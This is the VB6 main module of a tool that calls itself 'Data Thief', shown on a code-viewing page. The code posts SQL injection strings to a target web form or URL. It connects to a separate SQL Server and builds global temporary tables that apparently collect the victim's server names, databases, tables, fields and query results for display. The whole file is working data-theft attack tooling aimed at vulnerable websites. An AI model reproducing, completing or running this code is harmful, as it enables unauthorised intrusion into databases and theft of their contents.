📄 main.bas
字号:
Attribute VB_Name = "Main"
Option Explicit
Const USER_AGENT = "Data Thief V1.0 (Beta)"
Dim Con As New ADODB.Connection
'Open the url submiting the data
Public Sub OpenUrl(Url As String, Method As String, PostData As String)
Dim HttpParser As New XMLHTTP
Url = Replace(Url, " ", "%20")
If Method = "GET" Then
HttpParser.open Method, Url, False
HttpParser.setRequestHeader "User-Agent", USER_AGENT
HttpParser.send
Else
PostData = Replace(PostData, " ", "%20")
HttpParser.open Method, Url, False
HttpParser.setRequestHeader "User-Agent", USER_AGENT
HttpParser.setRequestHeader "Content-Type", "application/x-www-form-urlencoded"
HttpParser.send (PostData)
End If
FrmHtml.TxtHtml.Text = HttpParser.responseText
FrmHtml.WindowState = 1
FrmHtml.Show
Set HttpParser = Nothing
End Sub
'Get the servers names from temporary table
Public Sub GetServers()
Dim Rec As New ADODB.Recordset
Rec.ActiveConnection = Con
Rec.open "Select name from ##Servers"
FrmMain.LstLinkedServer.Clear
Do While Not Rec.EOF
FrmMain.LstLinkedServer.AddItem Rec.Fields(0)
Rec.MoveNext
Loop
Rec.Close
End Sub
'Get the databases names from temporary table
Public Sub GetDatabases()
Dim Rec As New ADODB.Recordset
Rec.ActiveConnection = Con
Rec.open "Select name from ##Databases"
FrmMain.LstDatabases.Clear
Do While Not Rec.EOF
FrmMain.LstDatabases.AddItem Rec.Fields(0)
Rec.MoveNext
Loop
Rec.Close
End Sub
'Get the tables names from temporary table
Public Sub GetTables()
Dim Rec As New ADODB.Recordset
Rec.ActiveConnection = Con
Rec.open "Select name from ##Tables", , , adLockOptimistic
FrmMain.LstTables.Clear
Do While Not Rec.EOF
FrmMain.LstTables.AddItem Rec.Fields(0)
Rec.Delete
Rec.MoveNext
Loop
Rec.Close
End Sub
'Get the fields names from temporary table
Public Sub GetFields()
Dim Rec As New ADODB.Recordset
Rec.ActiveConnection = Con
Rec.open "Select name from ##Fields", , , adLockOptimistic
FrmMain.LstFields.Clear
Do While Not Rec.EOF
FrmMain.LstFields.AddItem Rec.Fields(0)
Rec.Delete
Rec.MoveNext
Loop
Rec.Close
End Sub
'Get the SQL Server version from temporary table
Public Sub GetVersion()
Dim Rec As New ADODB.Recordset
Dim i As Integer
Rec.ActiveConnection = Con
Rec.open "Select * from ##version"
FrmMain.TxtOutput.Text = ""
If Not Rec.EOF Then
FrmMain.TxtOutput.Text = Rec.Fields(0).Name
FrmMain.TxtOutput.Text = FrmMain.TxtOutput.Text + vbCrLf + vbCrLf + Rec.GetString
End If
Rec.Close
End Sub
'Get the results of the query from temporary table
Public Sub GetResults()
Dim Rec As New ADODB.Recordset
Dim i As Integer
Rec.ActiveConnection = Con
Rec.open "Select * from ##tableresults"
FrmMain.TxtOutput.Text = ""
For i = 0 To Rec.Fields.Count - 1
FrmMain.TxtOutput.Text = FrmMain.TxtOutput.Text + Rec.Fields(i).Name + vbTab
Next i
If Not Rec.EOF Then
FrmMain.TxtOutput.Text = FrmMain.TxtOutput.Text + vbCrLf + vbCrLf + Rec.GetString
End If
Rec.Close
End Sub
Public Sub Connect(Server As String, Uid As String, Pwd As String, Port As String)
If Con = "" Then
Con.ConnectionString = "provider=sqloledb;Network=DBMSSOCN;Address=" + Server + "," + Port + ";uid=" + Uid + ";pwd=" + Pwd + ";"
Con.ConnectionTimeout = 10
Con.open
End If
End Sub
Public Sub Disconnect()
If Con <> "" Then Con.Close
Set Con = Nothing
End Sub
'Create temporary tables to hold the data
Public Sub CreateTables()
Dim Rec As New ADODB.Recordset
Rec.ActiveConnection = Con
Rec.open "if object_id('tempdb..##version') is not null drop table ##version "
Rec.open "create table ##version (VERSION varchar(500))"
Rec.open "if object_id('tempdb..##servers') is not null drop table ##servers "
Rec.open "create table ##servers (name varchar(128))"
Rec.open "if object_id('tempdb..##databases') is not null drop table ##databases "
Rec.open "create table ##databases (name varchar(128))"
Rec.open "if object_id('tempdb..##tables') is not null drop table ##tables "
Rec.open "create table ##tables (name varchar(128))"
Rec.open "if object_id('tempdb..##fields') is not null drop table ##fields "
Rec.open "create table ##fields (name varchar(128))"
End Sub
'Create a temporary table to hold query results
Public Sub CreateTableResults(Fields As String)
Dim Rec As New ADODB.Recordset
Dim StrArray() As String
Dim Query As String
Dim i As Byte
StrArray = Split(Fields, ",")
Query = "create table ##tableresults ("
If UBound(StrArray) = 0 Then
Query = Query + StrArray(0) + " sql_variant)"
Else
For i = 0 To UBound(StrArray)
'comment this if SQL Server 7
Query = Query + StrArray(i) + " sql_variant,"
'uncomment this if SQL Server 7
'Query = Query + StrArray(i) + " varchar(8000),"
Next i
Query = Left(Query, Len(Query) - 1) + ")"
End If
Rec.ActiveConnection = Con
Rec.open "if object_id('tempdb..##tableresults') is not null drop table ##tableresults "
Rec.open Query
End Sub
'Submit data
Public Sub SubmitInjection(Url As String, Method As String, PostData As String, InjectionStr As String)
If Method = "POST" Then
PostData = Replace(PostData, "<***>", InjectionStr)
OpenUrl Url, Method, PostData
Else
Url = Replace(Url, "<***>", InjectionStr)
OpenUrl Url, Method, PostData
End If
End Sub
⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -